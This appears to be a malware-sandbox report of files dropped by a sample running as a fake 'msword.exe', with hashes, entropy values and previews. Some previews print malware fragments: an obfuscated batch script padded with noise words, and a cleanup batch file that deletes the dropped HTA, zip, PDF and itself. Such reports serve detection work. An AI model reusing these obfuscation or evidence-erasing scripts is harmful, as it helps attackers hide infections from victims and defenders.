                                                                      Category:dropped
                                                                      Size (bytes):246
                                                                      Entropy (8bit):3.5197430193686525
                                                                      Encrypted:false
                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8+Da7:Qw946cPbiOxDlbYnuRK4
                                                                      MD5:6020096409DE2429E59A2A6570F67EF0
                                                                      SHA1:041790118BD8A685C0ADFB5271B10D0281660528
                                                                      SHA-256:F8E3748FAC8DE69E8A2356CEFF153070F3557417EAF13DB4202A24BFF16D4ED4
                                                                      SHA-512:A3CD3A0CBB9BA954262E4779214B69D0C878FC9A48516AFB3C23D1BEE28E66CE89FC95849EE96012093F3C65F21457FDBD447D52975061458B12DB9C30FCFB7C
                                                                      Malicious:false
                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.5./.1.2./.2.0.2.4. . .1.9.:.3.3.:.1.4. .=.=.=.....
                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):885684
                                                                      Entropy (8bit):6.621979600120346
                                                                      Encrypted:false
                                                                      SSDEEP:12288:UV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:uxz1JMyyzlohMf1tN70aw8501
                                                                      MD5:B52BB2B76BB34CE2AD510641DB438931
                                                                      SHA1:316D724878B112E97A432EC85D10A993BF073274
                                                                      SHA-256:0AE073B61844F6F34FA87101DC67487FE4256547A5633D8362BBE659B3CBBFED
                                                                      SHA-512:06A3DF9F4910E6C45A074368F3182A37CFC1DE91C749FDBF9C874FB23A555EDB1425534B62E63B23823744A7DF89A677A0455C08563B10F5F74F155014865702
                                                                      Malicious:false
                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      File Type:ASCII text, with very long lines (449), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):9301
                                                                      Entropy (8bit):5.189766528618456
                                                                      Encrypted:false
                                                                      SSDEEP:192:QbI91NlQY0j2psWVK6A7lsOwoo3YbYfW/hATo2GI3udfA7Lq+a:Qs91NlL/als5onYfeAs2GI38Ai
                                                                      MD5:3D5A3A147ED08ACC8A92B1B79225B16C
                                                                      SHA1:E9E24609206C346DF77B7E49E48838604765339D
                                                                      SHA-256:D0FC91805EF886D885E18D4988D1DD36BEF690E1A06ACE34D11913766904A64D
                                                                      SHA-512:8767663208DAF55592BC700FB2150418CDC042F74AEF461B4B0F6080EA839EEBF60C1AC1EB3CC0FB27C09157549E87A89C93731DC41D048D3007FBD604A0F5CD
                                                                      Malicious:false
                                                                      Preview:Set Christine=n..RGmwCho-Paste-Calgary-..dwfgTheory-Agreed-Hyundai-Signing-Blue-Romance-Conclusion-..vKKim-..IDmUIndividually-Days-Ez-Diy-Currently-Detector-Works-Classic-..zcFifteen-Latitude-Here-Resolution-Wing-..FickPage-Consumers-Scotland-Venezuela-Reprints-..ZCzClassified-Strip-Appeals-Feels-..PpRRelease-Sip-Scary-Vendor-Floyd-Mortality-Bald-Vbulletin-Pm-..UNbjPrincess-Authority-Ice-Encounter-Defensive-Publishers-Anchor-..eepHHeather-Focus-Bin-Horrible-..Set Edward=Q..keKept-Yards-Kills-Celtic-..HaFrReproduction-Hartford-Mass-Islands-Submission-Since-Belly-..NYMu-Mozambique-Longest-Throughout-Voyeurweb-..KjRnRemain-Japan-Keywords-Fathers-Assault-Adams-..BWHXRadios-..ujYNegative-..ntVVWake-Depend-Spokesman-Portion-..aklPillow-Aware-..BNthAnswered-Soccer-Organizer-..Set Justice=c..CUGxTold-Chicks-Lg-Agreements-Maritime-See-Disposition-Garlic-..aYAccessed-Endorsement-Ought-Iraqi-Orientation-Numeric-..UGnGear-Wonderful-Quantum-Called-..GVCConsiderable-Darwin-Dozen-Japanese-Thong-Revie
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:ASCII text, with very long lines (449), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):9301
                                                                      Entropy (8bit):5.189766528618456
                                                                      Encrypted:false
                                                                      SSDEEP:192:QbI91NlQY0j2psWVK6A7lsOwoo3YbYfW/hATo2GI3udfA7Lq+a:Qs91NlL/als5onYfeAs2GI38Ai
                                                                      MD5:3D5A3A147ED08ACC8A92B1B79225B16C
                                                                      SHA1:E9E24609206C346DF77B7E49E48838604765339D
                                                                      SHA-256:D0FC91805EF886D885E18D4988D1DD36BEF690E1A06ACE34D11913766904A64D
                                                                      SHA-512:8767663208DAF55592BC700FB2150418CDC042F74AEF461B4B0F6080EA839EEBF60C1AC1EB3CC0FB27C09157549E87A89C93731DC41D048D3007FBD604A0F5CD
                                                                      Malicious:false
                                                                      Preview:Set Christine=n..RGmwCho-Paste-Calgary-..dwfgTheory-Agreed-Hyundai-Signing-Blue-Romance-Conclusion-..vKKim-..IDmUIndividually-Days-Ez-Diy-Currently-Detector-Works-Classic-..zcFifteen-Latitude-Here-Resolution-Wing-..FickPage-Consumers-Scotland-Venezuela-Reprints-..ZCzClassified-Strip-Appeals-Feels-..PpRRelease-Sip-Scary-Vendor-Floyd-Mortality-Bald-Vbulletin-Pm-..UNbjPrincess-Authority-Ice-Encounter-Defensive-Publishers-Anchor-..eepHHeather-Focus-Bin-Horrible-..Set Edward=Q..keKept-Yards-Kills-Celtic-..HaFrReproduction-Hartford-Mass-Islands-Submission-Since-Belly-..NYMu-Mozambique-Longest-Throughout-Voyeurweb-..KjRnRemain-Japan-Keywords-Fathers-Assault-Adams-..BWHXRadios-..ujYNegative-..ntVVWake-Depend-Spokesman-Portion-..aklPillow-Aware-..BNthAnswered-Soccer-Organizer-..Set Justice=c..CUGxTold-Chicks-Lg-Agreements-Maritime-See-Disposition-Garlic-..aYAccessed-Endorsement-Ought-Iraqi-Orientation-Numeric-..UGnGear-Wonderful-Quantum-Called-..GVCConsiderable-Darwin-Dozen-Japanese-Thong-Revie
                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):78848
                                                                      Entropy (8bit):7.997642474583827
                                                                      Encrypted:true
                                                                      SSDEEP:1536:C8rW6c7wZq1wCXK1yDWHgpipHZAGuQetnB3vzrCtvPCoj2fQCyqMsgkE:dK7wZdCX3zopyyet1fmvPCToq8
                                                                      MD5:1C2CD5510A8B8BE255D26B74FBFC61EF
                                                                      SHA1:8DD84BE3314E46C2A41BFBD2D9873859D3F88B54
                                                                      SHA-256:8F7445D8F645AF42CC36F82642DF091756CF5DF22C5E32E695C5EB999194B0E5
                                                                      SHA-512:E0CE8FDB77E40CB073A0FEEDDCBCFF075439F601224374445E578B4BC02AC01B3A114E0612D7A6D90214F1D4AC2ACFE380DF4E8DBD3E428A8D9496E39C4F22A7
                                                                      Malicious:false
                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):7938
                                                                      Entropy (8bit):6.234825901896176
                                                                      Encrypted:false
                                                                      SSDEEP:192:BHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3ygxn:BHAHhww+/2nlP3r1WAL3yQn
                                                                      MD5:E65ADD0B46D5C8C0DEC008C11CBD71A5
                                                                      SHA1:894028D96A4649AC5403F3CE0FAF0C686AED4E32
                                                                      SHA-256:17610DA19952CEA20324EA64C7D6A8F27F21C639845F1C14B21194A0F5C2EA99
                                                                      SHA-512:B5FF13313576084EE8B0631F4F7D2518186165D25F7AB3DF7273A8CEF2D47E1DF322602A36441A4072A94B1F5E55D75DC5706CF92DBCAAD72B29B9E397BE6649
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with very long lines (393)
                                                                      Category:dropped
                                                                      Size (bytes):16525
                                                                      Entropy (8bit):5.345946398610936
                                                                      Encrypted:false
                                                                      SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                      MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                      SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                      SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                      SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                      Malicious:false
                                                                      Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):15114
                                                                      Entropy (8bit):5.364347385049213
                                                                      Encrypted:false
                                                                      SSDEEP:384:bjhu5rYlBQZzIT879pW8HZkZNqPpDe69jMY9/TfMNHVZATrKShlrEvEh4fpJivnA:Ryi
                                                                      MD5:B4FD8B07D721EA2987C99B971F41ECF1
                                                                      SHA1:8301B24B8D078A678771D8D6DA280E561E75D82A
                                                                      SHA-256:A8D082C2B50E07F6FD6513883BF5BCF958317675981800D2C50DDE8EDC38F07D
                                                                      SHA-512:C6EA12791C7FD44C2C58750887C68ECAD535CA94AF05B527A19C038C0813A64085702FD3188D4FB9A9D6B4AC43D711C6F9B0F578522841A8777E4811F1EDFE70
                                                                      Malicious:false
                                                                      Preview:SessionID=1b362f4a-54d4-452c-9684-5ed7c2e61d98.1734309189047 Timestamp=2024-12-15T19:33:09:047-0500 ThreadID=1184 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=1b362f4a-54d4-452c-9684-5ed7c2e61d98.1734309189047 Timestamp=2024-12-15T19:33:09:048-0500 ThreadID=1184 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=1b362f4a-54d4-452c-9684-5ed7c2e61d98.1734309189047 Timestamp=2024-12-15T19:33:09:048-0500 ThreadID=1184 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=1b362f4a-54d4-452c-9684-5ed7c2e61d98.1734309189047 Timestamp=2024-12-15T19:33:09:048-0500 ThreadID=1184 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=1b362f4a-54d4-452c-9684-5ed7c2e61d98.1734309189047 Timestamp=2024-12-15T19:33:09:048-0500 ThreadID=1184 Component=ngl-lib_NglAppLib Description="SetConf
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):29752
                                                                      Entropy (8bit):5.393112808012529
                                                                      Encrypted:false
                                                                      SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rk:g
                                                                      MD5:4B941995C9BDA0E889E09D54F1B81766
                                                                      SHA1:5B017213A3BF1F35A9F7AD889B853CCE59AF7FC1
                                                                      SHA-256:FF1481BD50EE126D935494FFBA79656315D976793E342F9D1296D9FBA4337A73
                                                                      SHA-512:5A3973BAFFA3E3F9948E6047D67AC4C13639FCC936F1F88DA1F3E43375A1202BA907DCBFE2E43C9AC5591800A4D4925AA7806CF5C7D3F3C7AE850D06D7D2773C
                                                                      Malicious:false
                                                                      Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                      Category:dropped
                                                                      Size (bytes):386528
                                                                      Entropy (8bit):7.9736851559892425
                                                                      Encrypted:false
                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                      Malicious:false
                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                      Category:dropped
                                                                      Size (bytes):758601
                                                                      Entropy (8bit):7.98639316555857
                                                                      Encrypted:false
                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                      MD5:3A49135134665364308390AC398006F1
                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                      Malicious:false
                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                      Category:dropped
                                                                      Size (bytes):1419751
                                                                      Entropy (8bit):7.976496077007677
                                                                      Encrypted:false
                                                                      SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                      MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                      SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                      SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                      SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                      Malicious:false
                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                      Category:dropped
                                                                      Size (bytes):1407294
                                                                      Entropy (8bit):7.97605879016224
                                                                      Encrypted:false
                                                                      SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje
                                                                      MD5:716C2C392DCD15C95BBD760EEBABFCD0
                                                                      SHA1:4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
                                                                      SHA-256:DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
                                                                      SHA-512:E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
                                                                      Malicious:false
                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                      Process:C:\Windows\SysWOW64\mshta.exe
                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):181
                                                                      Entropy (8bit):4.813093282519849
                                                                      Encrypted:false
                                                                      SSDEEP:3:mKDDCMN2RmDNv2lOt+kiE2J5xAIhMS2LFM2H5+Vovu9LsB8SAlOt+kiE2J5xAIzd:hWK2ON+cwkn23fhnKFM0qo29LiXwkn2h
                                                                      MD5:8A4A86F11D27DCCCA147E38CF567C423
                                                                      SHA1:9E47788F703F43B33AE0BE6953E03AFF5E6B75FA
                                                                      SHA-256:98D03BB2A460F8B05DA4D9D71FE3A7022450EDDABA0FD34BC29A7C50EA14BF31
                                                                      SHA-512:C32B1B94F403773D0895606B217F0B8DB7F0498BA09DCC8040F070D53B7A8C617A76A5E57158E9FA34A66CCB847831D7ABA6F3C82FAD20C2EF0E8946876EFF96
                                                                      Malicious:false
                                                                      Preview:@echo off..timeout /t 90 >nul..del "C:\Users\user\AppData\Local\Temp\temp.bat"..del f.pdf..del msword.zip..del downloaded.hta..del "C:\Users\user\AppData\Local\Temp\cleanup.bat"..
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PDF document, version 1.4, 4 pages
                                                                      Category:dropped
                                                                      Size (bytes):276302
                                                                      Entropy (8bit):7.83317883790279
                                                                      Encrypted:false
                                                                      SSDEEP:6144:f7TySmt1MtVReLAaFQfz33NKy1zdp7Vum1S6rpn7p5Xc7:jGSFUAaFInNKy1Dn1fn7plc7
                                                                      MD5:950557F66ABA12BF2797E9FC134B3DAA
                                                                      SHA1:B882BB3263A69B482C9914A6E2ADA437512C06BD
                                                                      SHA-256:7EC84FF21725BFFDE7F1301C5C3C34810FB1F92D690DBDDE3716860891E0588F
                                                                      SHA-512:03213B75B8383196478F20D0031C8E075D11FED31B89671405E48596F477955688AE234AE44A757E7931E4D5DF7846C644583FA2C60AC670596D219A99C88B91
                                                                      Malicious:true
                                                                      Preview:%PDF-1.4..%......1 0 obj..<< .. /BitsPerComponent 1 .. /ColorSpace 3 0 R .. /Height 3288 .. /Subtype /Image .. /Type /XObject .. /Width 2560 .. /Filter [.. /CCITTFaxDecode ].. .. /DecodeParms [.. << .. /BlackIs1 true .. /Columns 2560 .. /K -1 .. /Rows 3288 .. >>.. ].. .. /Length 2 0 R .. >>..stream..&.>.....m.F.....A.....d.......'d....r.d...9..x8..*.A....m...9...# U.a.Hs.f..@.....$..Xk w....nENS`f@....`...W.9....q.(.L).....`..M%..A...l.."m^@...B.g6...P....4.q..N...)...(......r..Jr......qY.H.D.v.Dq...$X.........T..$.g.^dH.A.9..A......Lz..d.l..A.C[.........*e....E....L.... ...........<.P...$...8k......................&..}...?...............s5...~........._........_...........H...hLP.<..3"...4...."....#.5\.?...3......A...S..y+.BJD.. b!......x(]......T. A.< ._O_P.%.Z......"sK.5..G...!q.H.I'..E.D=..!....%t......g.#.;.H.gA.8........F.j.....:^...Y...H...P`.A.!....e.'.Ma.i.}8M{. ...D. .!..B. ..v.z.p.i='K.J...#.
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                      Category:dropped
                                                                      Size (bytes):3802499
                                                                      Entropy (8bit):4.6033990571172305
                                                                      Encrypted:false
                                                                      SSDEEP:24576:cvQoCg23M7h2IqMNR4WbINxZAQlB+U0zUc:QQvg23M5R4WbI3LlAU0Uc
                                                                      MD5:AC1BB7433BD4A06FA226CFD057526675
                                                                      SHA1:A954C6F43448A85C209CA49408F02FF62A2EE08D
                                                                      SHA-256:CE5E1DBA0DFF8A00221D668D1E6B64419D57073F602CC12EEDFB8CCD46B403EB
                                                                      SHA-512:A0400A7A4C71C5725BF9295C7EB9F6E5C63C2ECA949F922C2A4C31C873EE72F595DBF70ED212CAE2B887E51B89D69F2446288227174A63F9A9429F1EBC888927
                                                                      Malicious:true
